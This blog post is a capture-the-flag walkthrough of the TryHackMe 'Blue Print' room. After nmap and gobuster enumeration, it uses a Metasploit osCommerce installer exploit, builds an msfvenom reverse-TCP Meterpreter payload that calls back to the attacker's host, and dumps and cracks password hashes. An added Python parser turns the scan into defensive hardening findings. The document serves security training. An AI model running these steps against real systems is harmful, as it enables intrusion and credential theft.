CatSec.org

Blue Print

In this post, we will look into the room “Blue Print” from TryHackMe, which can be found on https://tryhackme.com

Enumeration

echo machine-ip blueprint.com >> /etc/hosts

# Nmap 7.80 scan initiated Thu Jun 18 03:21:05 2020 as: nmap -sC -sV -oN nmap.txt blueprint.com
Nmap scan report for blueprint.com (10.10.135.2)
Host is up (0.48s latency).
Not shown: 987 closed ports
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: 404 - File or directory not found.
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp   open  ssl/http     Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2h PHP/5.6.28)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
|_http-title: Bad request!
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp   open  microsoft-ds Windows 7 Home Basic 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3306/tcp  open  mysql        MariaDB (unauthorized)
8080/tcp  open  http         Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
|_http-title: Index of /
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49158/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  msrpc        Microsoft Windows RPC
49160/tcp open  msrpc        Microsoft Windows RPC
Service Info: Hosts: BLUEPRINT, localhost; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -19m57s, deviation: 34m36s, median: 0s
|_nbstat: NetBIOS name: BLUEPRINT, NetBIOS user: <unknown>, NetBIOS MAC: 02:2c:8d:2f:12:fa (unknown)
| smb-os-discovery: 
|   OS: Windows 7 Home Basic 7601 Service Pack 1 (Windows 7 Home Basic 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1
|   Computer name: BLUEPRINT
|   NetBIOS computer name: BLUEPRINT\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-06-18T08:23:19+01:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-06-18T07:23:16
|_  start_date: 2020-06-18T07:17:16

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jun 18 03:23:34 2020 -- 1 IP address (1 host up) scanned in 149.46 seconds
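Added example (not part of the original write-up): a small Python parser for the nmap -oN output above that pulls out the hardening issues a defender would want to act on (TRACE enabled, expired TLS certificate, directory listing at the web root, SMB signing disabled). The sample input is a constructed excerpt of the scan shown above.

```python
import re
from datetime import datetime

# Constructed excerpt of the nmap -oN output above (trimmed sample input).
SAMPLE_NMAP = """\
80/tcp    open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_  Potentially risky methods: TRACE
443/tcp   open  ssl/http     Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2h PHP/5.6.28)
|_  Potentially risky methods: TRACE
| ssl-cert: Subject: commonName=localhost
|_Not valid after:  2019-11-08T23:48:47
8080/tcp  open  http         Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
|_http-title: Index of /
Host script results:
|_  message_signing: disabled (dangerous, but default)
"""

PORT_RE = re.compile(r"^(\d+)/(?:tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")
def parse_nmap(text):
    """Group NSE script lines under the port (or 'host') they belong to."""
    blocks, current = {}, None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = int(m.group(1))
            blocks[current] = {"state": m.group(2), "service": m.group(3),
                               "version": m.group(4), "scripts": []}
        elif line.startswith("Host script results"):
            current = "host"
            blocks[current] = {"scripts": []}
        elif line.startswith("|") and current is not None:
            # Drop the "| " / "|_ " tree prefix nmap puts on script output.
            blocks[current]["scripts"].append(line.lstrip("|_ ").rstrip())
    return blocks
def findings(blocks, scan_date):
    """Turn a parsed scan into hardening findings; scan_date is ISO 'YYYY-MM-DD'."""
    scanned, out = datetime.fromisoformat(scan_date), []
    for port, info in blocks.items():
        for s in info["scripts"]:
            if "risky methods: TRACE" in s:
                out.append(f"{port}: HTTP TRACE enabled; disable it in the server config")
            elif s.startswith("Not valid after:"):
                expiry = datetime.fromisoformat(s.split(":", 1)[1].strip())
                if expiry < scanned:
                    out.append(f"{port}: TLS certificate expired on {expiry.date()}")
            elif s.startswith("http-title: Index of"):
                out.append(f"{port}: directory listing exposed at the web root")
            elif "message_signing: disabled" in s:
                out.append("host: SMB message signing disabled; require signing")
    return out
```

Run it against a full -oN file by passing the file contents to parse_nmap and the scan date from the "Nmap done at" line to findings.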

I tried running enum4linux but could not get anything; EternalBlue also does not work.

The web server on port 80 has nothing.

Moving on to the web server on port 8080.

We see a website; let's use gobuster for directory brute-forcing:

gobuster dir -u http://blueprint.com:8080/oscommerce-2.3.4/catalog/  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
2020/06/18 03:47:51 Starting gobuster
===============================================================
/download (Status: 401)
/images (Status: 301)
/pub (Status: 301)
/Images (Status: 301)
/admin (Status: 301)
/includes (Status: 301)
/install (Status: 301)
/Download (Status: 401)
/ext (Status: 301)
/INSTALL (Status: 301)
/IMAGES (Status: 301)
/%20 (Status: 403)
/Admin (Status: 301)
/*checkout* (Status: 403)

Checking the install page, we see something fishy, and we also get the version of osCommerce. Now let's dig deeper into this web server and search for an exploit: start Metasploit and search for oscommerce.

Exploitation

Exploit we will use: exploit/multi/http/oscommerce_installer_unauth_code_exec. Set the options, then run:

exploit

We will get a Meterpreter session, but this session is not stable.

So we will create a payload and upload it using the Meterpreter session:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

Open another tab and run Metasploit.

Use the handler and run it.

On the previous Meterpreter session, run:
execute -f shell.exe
and we will get a new Meterpreter session that is stable. Run:
hashdump
to look for hashes and crack them online using https://crackstation.net

Lab user hash

Lab:1000:aad3b435b51404eeaad3b435b51404ee:??????????????????????:::

go????????

root flag

Navigate to C:\Users\Administrator\Desktop and cat the root flag:

THM{????????????????????9bee}